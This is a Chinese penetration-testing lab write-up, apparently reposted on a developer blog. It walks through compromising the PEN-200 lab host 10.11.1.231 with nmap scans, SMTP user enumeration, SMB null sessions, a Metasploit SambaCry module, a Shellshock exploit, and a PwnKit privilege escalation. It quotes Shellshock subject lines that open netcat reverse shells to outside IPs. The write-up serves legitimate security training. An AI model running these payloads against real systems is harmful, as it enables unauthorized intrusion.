首页    技术博客    PHP教程    数据库技术    前端开发   HTML5    Nginx    php论坛
新用户注册 | 会员登录
加入会员,解锁专属内容
取消
热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

【pen200lab】10.11.1.231

作者:mobiledu2502917123 | 来源:互联网 | 2023-09-15 11:13
pen200-lab学习笔记【pen200-lab】10.11.1.231🔥系列专栏:pen200-lab🎉欢迎关注🔎




pen200-lab 学习笔记

【pen200-lab】10.11.1.231


🔥系列专栏:pen200-lab
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月27日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!



文章目录


  • pen200-lab 学习笔记
    • 信息收集
    • smtp
    • rpc




信息收集

nmap -p- --min-rate 10000 -A 10.11.1.231

22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 b68d1ef380643f8a9652927a9fb1be67 (DSA)
| 2048 72c406a72f711b6a6b57fecfad3f9c16 (RSA)
|_ 256 6bc66efbba06dc23f93e01a62a87481a (ECDSA)
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=localhost.localdomain
| Not valid before: 2013-05-05T06:42:26
|_Not valid after: 2023-05-03T06:42:26
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: mail.local, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SECURITY)
445/tcp open netbios-ssn Samba smbd 4.2.10-Debian (workgroup: SECURITY)

鉴于它存在samba的版本问题,我将首先尝试已知方法

use exploit/linux/samba/is_known_pipename
set rhoat[靶机ip]
run
shell
id

他也许不能成功,所以我也不会放弃smb枚举
在这里插入图片描述是的,它无法成功,因为smb没有公开共享
而这个漏洞的利用条件就是需要一个共享目录可读可写

所以目前我将从rpc以及smtp中尝试枚举到一些信息
如果我获得一些凭据,使我在smb中拥有可读写目录时,我会继续尝试攻击


smtp

nmap --script smtp-enum-users 10.11.1.231
22/tcp open ssh
25/tcp open smtp
| smtp-enum-users:
|_ Method RCPT returned a unhandled status code.
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds

或者

smtp-user-enum -M VRFY -U [字典] -t 192.168.247.151
-M ---用于猜测用户名 EXPN、VRFY 或 RCPT 的方法(默认值:VRFY)
-U ---通过 smtp 服务检查的用户名文件
-t ---host 服务器主机运行 smtp 服务
字典是这个,也可以选取类似:
/usr/share/metasploit-framework/data/wordlists/unix_users.txt

得到了下面的很多用户

######## Scan started at Fri Dec 2 02:12:17 2022 #########
10.11.1.231: avahi exists
10.11.1.231: avahi-autoipd exists
10.11.1.231: backup exists
10.11.1.231: bin exists
10.11.1.231: colord exists
10.11.1.231: daemon exists
10.11.1.231: ftp exists
10.11.1.231: games exists
10.11.1.231: gnats exists
10.11.1.231: hplip exists
10.11.1.231: irc exists
10.11.1.231: list exists
10.11.1.231: lp exists
10.11.1.231: mail exists
10.11.1.231: man exists
10.11.1.231: messagebus exists
10.11.1.231: news exists
10.11.1.231: nobody exists
10.11.1.231: postfix exists
10.11.1.231: postmaster exists
10.11.1.231: proxy exists
10.11.1.231: root exists
10.11.1.231: ROOT exists
10.11.1.231: saned exists
10.11.1.231: sshd exists
10.11.1.231: sync exists
10.11.1.231: sys exists
10.11.1.231: systemd-bus-proxy exists
10.11.1.231: systemd-timesync exists
10.11.1.231: systemd-resolve exists
10.11.1.231: systemd-network exists
10.11.1.231: uucp exists
10.11.1.231: uuidd exists
10.11.1.231: webmaster exists
10.11.1.231: www exists
10.11.1.231: www-data exists
######## Scan completed at Fri Dec 2 02:12:58 2022 #########

rpc

在这里插入图片描述
同样没有枚举出任何东西
仅仅存在空绑定

到目前为止,我将继续仔细搜索smb的漏洞,也许与上次的有所不同
在这里插入图片描述

得到的结果依旧是2017-7494

我还是要试试
首先我探索空绑定

smbclient -N -L //10.11.1.231

我很好奇为什么smbmap这里什么都没有
在这里插入图片描述于是我又尝试了一下smbmap
在这里插入图片描述

非常诧异
我将在tmp下继续枚举

smbclient -N //10.11.1.231/tmp

在这里插入图片描述
在这里插入图片描述
查看其他的两个共享目录
在这里插入图片描述docs以及home全是空文件
不过docs看起来是一个文件
home全是user
又可能这是用户列表
user1-9 以及useradm

在这里插入图片描述到目前为止,我们具有很多的用户,但是没有密码

接着我在smb中枚举,发现了log文件,其中有意思的信息有下面两条,这很敏感的将我指引到了shellshock

FROM= useradm@mail.local"
"SUBJECT=() { :; };/bin/nc 192.168.119.221 4444 -e /bin/sh;"
Subject:() { :; };/bin/nc 192.168.119.123 1234 -e /bin/sh;

我将在这里找到exp

https://gist.github.com/YSSVirus/0978adadbb8827b53065575bb8fbcb25

而后如此利用
就可以获得一个shell
而后我进行linpeas.sh枚举

python2 exp.py 10.11.1.231 useradm@mail.local 192.168.119.175 1234 useradm@mail.local

在这里插入图片描述

https://github.com/c3c/CVE-2021-4034

在这里找到对应版本即可
而后上传赋权利用即可







推荐阅读
  • int

    H323资料

    概述H.323是由ITU制定的通信控制协议,用于在分组交换网中提供多媒体业务。呼叫控制是其中的重要组成部分,它可用来建立点到点的媒体会话和多点间媒体会议 ... [详细]
  • int

    Spring特性实现接口多类的动态调用详解

    Spring特性实现接口多类的动态调用详解
    本文详细介绍了如何使用Spring特性实现接口多类的动态调用。通过对Spring IoC容器的基础类BeanFactory和ApplicationContext的介绍,以及getBeansOfType方法的应用,解决了在实际工作中遇到的接口及多个实现类的问题。同时,文章还提到了SPI使用的不便之处,并介绍了借助ApplicationContext实现需求的方法。阅读本文,你将了解到Spring特性的实现原理和实际应用方式。 ... [详细]
  • int

    的错误消息:

    ZSI.generate.Wsdl2PythonError: unsupported local simpleType restriction ... [详细]
  • int

    自动轮播,反转播放的ViewPagerAdapter的使用方法和效果展示

    自动轮播,反转播放的ViewPagerAdapter的使用方法和效果展示
    本文介绍了如何使用自动轮播、反转播放的ViewPagerAdapter,并展示了其效果。该ViewPagerAdapter支持无限循环、触摸暂停、切换缩放等功能。同时提供了使用GIF.gif的示例和github地址。通过LoopFragmentPagerAdapter类的getActualCount、getActualItem和getActualPagerTitle方法可以实现自定义的循环效果和标题展示。 ... [详细]
  • uri

    如何在Azure应用服务实例上获取.NetCore 3.0+的支持?

    本文介绍了如何在Azure应用服务实例上获取.NetCore 3.0+的支持。作者分享了自己在将代码升级为使用.NET Core 3.0时遇到的问题,并提供了解决方法。文章还介绍了在部署过程中使用Kudu构建的方法,并指出了可能出现的错误。此外,还介绍了开发者应用服务计划和免费产品应用服务计划在不同地区的运行情况。最后,文章指出了当前的.NET SDK不支持目标为.NET Core 3.0的问题,并提供了解决方案。 ... [详细]
  • stream

    解决nginx启动报错epoll_wait() reported that client prematurely closed connection的方法

    解决nginx启动报错epoll_wait() reported that client prematurely closed connection的方法
    本文介绍了解决nginx启动报错epoll_wait() reported that client prematurely closed connection的方法,包括检查location配置是否正确、pass_proxy是否需要加“/”等。同时,还介绍了修改nginx的error.log日志级别为debug,以便查看详细日志信息。 ... [详细]
  • int

    31.项目部署

    31.项目部署
    目录1一些概念1.1项目部署1.2WSGI1.3uWSGI1.4Nginx2安装环境与迁移项目2.1项目内容2.2项目配置2.2.1DEBUG2.2.2STAT ... [详细]
  • function

    【shell】网络处理:判断IP是否在网段、两个ip是否同网段、IP地址范围、网段包含关系

    【shell】网络处理:判断IP是否在网段、两个ip是否同网段、IP地址范围、网段包含关系
    本文介绍了使用shell脚本判断IP是否在同一网段、判断IP地址是否在某个范围内、计算IP地址范围、判断网段之间的包含关系的方法和原理。通过对IP和掩码进行与计算,可以判断两个IP是否在同一网段。同时,还提供了一段用于验证IP地址的正则表达式和判断特殊IP地址的方法。 ... [详细]
  • int

    PDO MySQL

    PDO MySQL
    PDOMySQL如果文章有成千上万篇,该怎样保存?数据保存有多种方式,比如单机文件、单机数据库(SQLite)、网络数据库(MySQL、MariaDB)等等。根据项目来选择,做We ... [详细]
  • select

    MySQL中的MVVC多版本并发控制机制的应用及实现

    MySQL中的MVVC多版本并发控制机制的应用及实现
    本文介绍了MySQL中MVCC的应用及实现机制。MVCC是一种提高并发性能的技术,通过对事务内读取的内存进行处理,避免写操作堵塞读操作的并发问题。与其他数据库系统的MVCC实现机制不尽相同,MySQL的MVCC是在undolog中实现的。通过undolog可以找回数据的历史版本,提供给用户读取或在回滚时覆盖数据页上的数据。MySQL的大多数事务型存储引擎都实现了MVCC,但各自的实现机制有所不同。 ... [详细]
  • js

    Android实战——jsoup实现网络爬虫,糗事百科项目的起步

    Android实战——jsoup实现网络爬虫,糗事百科项目的起步
    本文介绍了Android实战中使用jsoup实现网络爬虫的方法,以糗事百科项目为例。对于初学者来说,数据源的缺乏是做项目的最大烦恼之一。本文讲述了如何使用网络爬虫获取数据,并以糗事百科作为练手项目。同时,提到了使用jsoup需要结合前端基础知识,以及如果学过JS的话可以更轻松地使用该框架。 ... [详细]
  • js

    centos安装Mysql的方法及步骤详解

    centos安装Mysql的方法及步骤详解
    本文介绍了centos安装Mysql的两种方式:rpm方式和绿色方式安装,详细介绍了安装所需的软件包以及安装过程中的注意事项,包括检查是否安装成功的方法。通过本文,读者可以了解到在centos系统上如何正确安装Mysql。 ... [详细]
  • process

    微软评估和规划(MAP)的工具包介绍及应用实验手册

    微软评估和规划(MAP)的工具包介绍及应用实验手册
    本文介绍了微软评估和规划(MAP)的工具包,该工具包是一个无代理工具,旨在简化和精简通过网络范围内的自动发现和评估IT基础设施在多个方案规划进程。工具包支持库存和使用用于SQL Server和Windows Server迁移评估,以及评估服务器的信息最广泛使用微软的技术。此外,工具包还提供了服务器虚拟化方案,以帮助识别未被充分利用的资源和硬件需要成功巩固服务器使用微软的Hyper - V技术规格。 ... [详细]
  • int

    Window10+anaconda+python3.5.4+ tensorflow1.5+ keras(GPU版本)安装教程

    Window10+anaconda+python3.5.4+ tensorflow1.5+ keras(GPU版本)安装教程 ... [详细]
  • int

    Django + Ansible 主机管理(有源码)

    Django + Ansible 主机管理(有源码)
    本文给大家介绍如何利用DjangoAnsible进行Web项目管理。Django介绍一个可以使Web开发工作愉快并且高效的Web开发框架,能够以最小的代价构建和维护高 ... [详细]
author-avatar
mobiledu2502917123
这个家伙很懒,什么也没留下!
Tags | 热门标签
RankList | 热门文章
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有